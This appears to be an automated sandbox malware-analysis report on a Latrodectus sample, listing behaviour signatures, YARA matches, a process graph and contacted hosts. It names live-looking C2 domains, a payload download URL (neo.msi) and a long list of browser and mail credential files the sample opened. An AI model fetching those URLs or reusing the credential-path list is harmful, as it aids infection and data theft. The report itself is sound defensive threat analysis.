Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005A37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_005A37D5
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000235B5CE8AE0 GetUserNameA,wsprintfA, 5_2_00000235B5CE8AE0
Source: C:\Windows\Installer\MSI181.tmp Code function: 3_2_005B7B1F GetTimeZoneInformation, 3_2_005B7B1F
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180040CB0 GetVersionExW,memset,SHGetValueW,atoi,GetVersion,GetModuleHandleW,GetProcAddress, 5_2_0000000180040CB0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195527472.000001BA315C1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197567716.000001BA30E04000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198389335.000001BA30E02000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3197873224.0000008797B37000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ndows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: 360tray.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000002.3198657676.000001BA30FEA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 0000002A.00000003.3194482895.000001BA30DD8000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198278627.000001BA30DE5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3195192679.000001BA30DE4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3196824187.000001BA3159C000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000002.3198199363.000001BA30DDA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: rundll32.exe Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe
Source: WMIC.exe, 0000002A.00000003.3195192679.000001BA30DF5000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197538144.000001BA30DF9000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 0000002A.00000003.3197642042.000001BA30E00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Latrodectus
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected Latrodectus
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b4340000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.rundll32.exe.1ef532a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.235b5ce0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2983475717.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2790656279.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2738493222.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2983528800.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2934278162.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.3043571681.000001800FE30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683586362.00000235B4340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1683713965.00000235B5CE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715800687.000001EF532A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2995791620.0000018010010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2856871010.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1715838763.000001EF532B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2656498432.000001800FA60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7784, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1432364 Sample: Document_a51_19i793302-14b0... Startdate: 26/04/2024 Architecture: WINDOWS Score: 100 89 pewwhranet.com 2->89 91 jarinamaers.shop 2->91 93 grizmotras.com 2->93 111 Found malware configuration 2->111 113 Multi AV Scanner detection for dropped file 2->113 115 Multi AV Scanner detection for submitted file 2->115 117 5 other signatures 2->117 13 msiexec.exe 15 39 2->13         started        18 chrome.exe 1 2->18         started        20 chrome.exe 2->20         started        22 2 other processes 2->22 signatures3 process4 dnsIp5 103 146.19.106.236, 49732, 80 FITC-ASUS France 13->103 81 C:\Windows\Installer\MSIFFD6.tmp, PE32 13->81 dropped 83 C:\Windows\Installer\MSIC4.tmp, PE32 13->83 dropped 85 C:\Windows\Installer\MSIA3.tmp, PE32 13->85 dropped 87 3 other malicious files 13->87 dropped 137 Drops executables to the windows directory (C:\Windows) and starts them 13->137 24 MSI181.tmp 1 13->24         started        26 msiexec.exe 13->26         started        105 192.168.2.13 unknown unknown 18->105 107 192.168.2.14 unknown unknown 18->107 109 4 other IPs or domains 18->109 28 chrome.exe 18->28         started        31 chrome.exe 20->31         started        file6 signatures7 process8 dnsIp9 33 rundll32.exe 24->33         started        101 www.google.com 142.250.217.228, 443, 49736, 49737 GOOGLEUS United States 28->101 process10 process11 35 rundll32.exe 2 33->35         started        file12 77 C:\Users\user\AppData\...\Update_cd47bedf.dll, PE32+ 35->77 dropped 79 :wtfbbq (copy), PE32+ 35->79 dropped 119 Contains functionality to compare user and computer (likely to detect sandboxes) 35->119 121 Contains functionality to detect sleep reduction / modifications 35->121 39 rundll32.exe 21 35->39         started        signatures13 process14 dnsIp15 95 jarinamaers.shop 104.21.46.75, 443, 49760, 49761 CLOUDFLARENETUS United States 39->95 97 pewwhranet.com 172.67.197.34, 443, 49800, 49803 CLOUDFLARENETUS United States 39->97 99 grizmotras.com 172.67.219.28, 443, 49765, 49767 CLOUDFLARENETUS United States 39->99 123 System process connects to network (likely due to code injection or exploit) 39->123 125 Tries to steal Mail credentials (via file / registry access) 39->125 127 Tries to harvest and steal browser information (history, passwords, etc) 39->127 43 cmd.exe 1 39->43         started        46 cmd.exe 1 39->46         started        48 cmd.exe 39->48         started        50 8 other processes 39->50 signatures16 process17 signatures18 131 Uses net.exe to modify the status of services 43->131 133 Uses ipconfig to lookup or modify the Windows network settings 43->133 135 Performs a network lookup / discovery via net view 43->135 52 conhost.exe 43->52         started        54 ipconfig.exe 1 43->54         started        56 systeminfo.exe 46->56         started        59 conhost.exe 46->59         started        67 2 other processes 48->67 61 net.exe 50->61         started        63 net.exe 50->63         started        65 conhost.exe 50->65         started        69 11 other processes 50->69 process19 signatures20 129 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 56->129 71 WmiPrvSE.exe 56->71         started        73 net1.exe 61->73         started        75 net1.exe 63->75         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.217.228
 www.google.com United States
15169 GOOGLEUS false
104.21.46.75
 jarinamaers.shop United States
13335 CLOUDFLARENETUS true
172.67.197.34
 pewwhranet.com United States
13335 CLOUDFLARENETUS true
172.67.219.28
 grizmotras.com United States
13335 CLOUDFLARENETUS true
239.255.255.250
 unknown Reserved
unknown unknown false
146.19.106.236
 unknown France
7726 FITC-ASUS false

Private

IP
192.168.2.4
192.168.2.13
192.168.2.23
192.168.2.15
192.168.2.14

Contacted Domains

Name IP Active
jarinamaers.shop 104.21.46.75 true
pewwhranet.com 172.67.197.34 true
grizmotras.com 172.67.219.28 true
www.google.com 142.250.217.228 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://146.19.106.236/neo.msi false
  • Avira URL Cloud: safe
 unknown
https://startmast.shop/live/ true
  • Avira URL Cloud: safe
 unknown
https://jarinamaers.shop/files/stkm.bin true
  • Avira URL Cloud: safe
 unknown
https://pewwhranet.com/live/ true
  • Avira URL Cloud: safe
 unknown
https://grizmotras.com/live/ true
  • Avira URL Cloud: safe
 unknown
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
    		high
    https://jarinamaers.shop/live/ true
    • Avira URL Cloud: safe
    		 unknown
    https://www.google.com/async/newtab_promos false
      		high
      https://www.google.com/async/ddljson?async=ntp:2 false
        		high
        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
          		high
          https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGLizsLEGIjAYi0E5THM4aIj8FUOrJpdUpPAhU1RG5ebUtVLBNvumYZ4qVuqJu7WbwqMCr0qqjPIyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
            		high
            https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGLizsLEGIjBzxD8y3zpVM4rvYXOzD0wZHGfxDV2C93K9X3HWoqlaBUqfM3Uck6U5jewh4t8bDhoyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
              		high